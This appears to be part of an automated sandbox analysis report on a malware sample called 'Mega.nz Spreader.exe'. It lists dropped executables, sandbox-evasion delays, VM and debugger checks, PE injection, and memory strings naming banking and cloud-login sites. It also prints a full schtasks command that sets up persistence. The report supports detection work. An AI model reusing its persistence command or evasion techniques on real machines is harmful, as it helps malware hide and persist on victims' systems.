Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 599764	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 599217	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 598889	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 598780	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 598211	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 597874	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 597217	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 596999	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 596779	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 596670	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 596557	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 596386	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 596280	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 596061	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 595732	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 595514	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 595296	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 595184	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 595075	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 922337203685477

Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: svcupdater.exe, 00000012.00000002.2877978549.0000000002910000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: api.exe, 00000003.00000003.2053441893.0000000000C9A000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2057217050.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000002.2260553543.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2256100134.0000000000C9A000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2065711789.0000000000C9A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%
Source: api.exe, 00000003.00000003.2053441893.0000000000C9A000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2057217050.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000002.2260553543.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000002.2260386826.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2256100134.0000000000C9A000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2065711789.0000000000C9A000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2075720717.0000026B4E05B000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2066636421.0000026B4E01C000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077476000.0000026B4E05D000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000002.2082653981.0000026B4E05E000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2074223292.0000026B4E058000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svcupdater.exe, 00000012.00000002.2877978549.0000000002910000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: svcupdater.exe, 00000012.00000002.2877978549.0000000002910000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: svcupdater.exe, 00000012.00000002.2877978549.0000000002910000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: svcupdater.exe, 00000012.00000002.2877978549.0000000002910000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: svcupdater.exe, 00000012.00000002.2877978549.0000000002910000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: svcupdater.exe, 00000011.00000002.3285920621.0000000000E75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: svcupdater.exe, 00000012.00000002.2877978549.0000000002910000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: svcupdater.exe, 00000012.00000002.2877978549.0000000002910000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: svcupdater.exe, 00000012.00000002.2877978549.0000000002910000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: api.exe, 00000003.00000003.2061946849.0000000003C9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Local\Temp\api.exe

Code function: 3_2_00DF491D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_00DF491D

Source: C:\Users\user\AppData\Local\Temp\api.exe

Code function: 3_2_00DF867D VirtualProtect ?,-00000001,00000104,?,?,?,0000001C

3_2_00DF867D

Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00E00FF0 mov eax, dword ptr fs:[00000030h]	3_2_00E00FF0
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00E01034 mov eax, dword ptr fs:[00000030h]	3_2_00E01034
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00E00ECD mov ecx, dword ptr fs:[00000030h]	3_2_00E00ECD

Source: C:\Users\user\AppData\Local\Temp\lib.exe

Code function: 5_2_00007FF759972620 GetProcessHeap,

5_2_00007FF759972620

Source: C:\Users\user\AppData\Local\Temp\leaf.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Code function: 0_2_004014AD EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,	0_2_004014AD
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00E1050F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00E1050F
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00DF491D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00DF491D
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00E0FEB0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00E0FEB0
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF75995AA2C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FF75995AA2C
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF75995A180 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FF75995A180
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF759969C44 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FF759969C44
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF75995ABD4 SetUnhandledExceptionFilter,	5_2_00007FF75995ABD4
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF75995AA2C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF75995AA2C
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF75995A180 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00007FF75995A180
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF759969C44 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF759969C44
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF75995ABD4 SetUnhandledExceptionFilter,	7_2_00007FF75995ABD4
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF8B8F82600 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00007FF8B8F82600
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF8B8F82BC0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF8B8F82BC0
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF8B9061B00 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF8B9061B00
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF8B9061530 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00007FF8B9061530
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF8B93C6254 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF8B93C6254
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF8B93C5CB0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00007FF8B93C5CB0
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF8B98452F0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF8B98452F0
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF8B9844D20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00007FF8B9844D20
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF8B9F70468 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00007FF8B9F70468

Source: C:\Users\user\AppData\Local\Temp\leaf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe

Memory written: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Process created: C:\Users\user\AppData\Local\Temp\leaf.exe "C:\Users\user\AppData\Local\Temp\leaf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Process created: C:\Users\user\AppData\Local\Temp\api.exe "C:\Users\user\AppData\Local\Temp\api.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Process created: C:\Users\user\AppData\Local\Temp\lib.exe "C:\Users\user\AppData\Local\Temp\lib.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process created: C:\Users\user\AppData\Local\Temp\leaf.exe "{path}"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process created: C:\Users\user\AppData\Local\Temp\leaf.exe "{path}"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Process created: C:\Users\user\AppData\Local\Temp\lib.exe "C:\Users\user\AppData\Local\Temp\lib.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /tn \eOzNUSwmQA /tr "C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn \eOzNUSwmQA /tr "C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process created: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe "{path}"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process created: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe "{path}"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process created: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe "{path}"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\api.exe

Code function: 3_2_00E1070C cpuid

3_2_00E1070C

Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	3_2_00E09000
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: EnumSystemLocalesW,	3_2_00E092ED
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: EnumSystemLocalesW,	3_2_00E092A2
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: GetLocaleInfoW,	3_2_00DFF22B
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: EnumSystemLocalesW,	3_2_00E09388
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_00E09413
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: GetLocaleInfoW,	3_2_00E09666
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: GetLocaleInfoEx,FormatMessageA,	3_2_00E147AB
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_00E0978F
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: GetLocaleInfoW,	3_2_00E09895
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_00E09964
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: EnumSystemLocalesW,	3_2_00DFEC4F

Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\leaf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
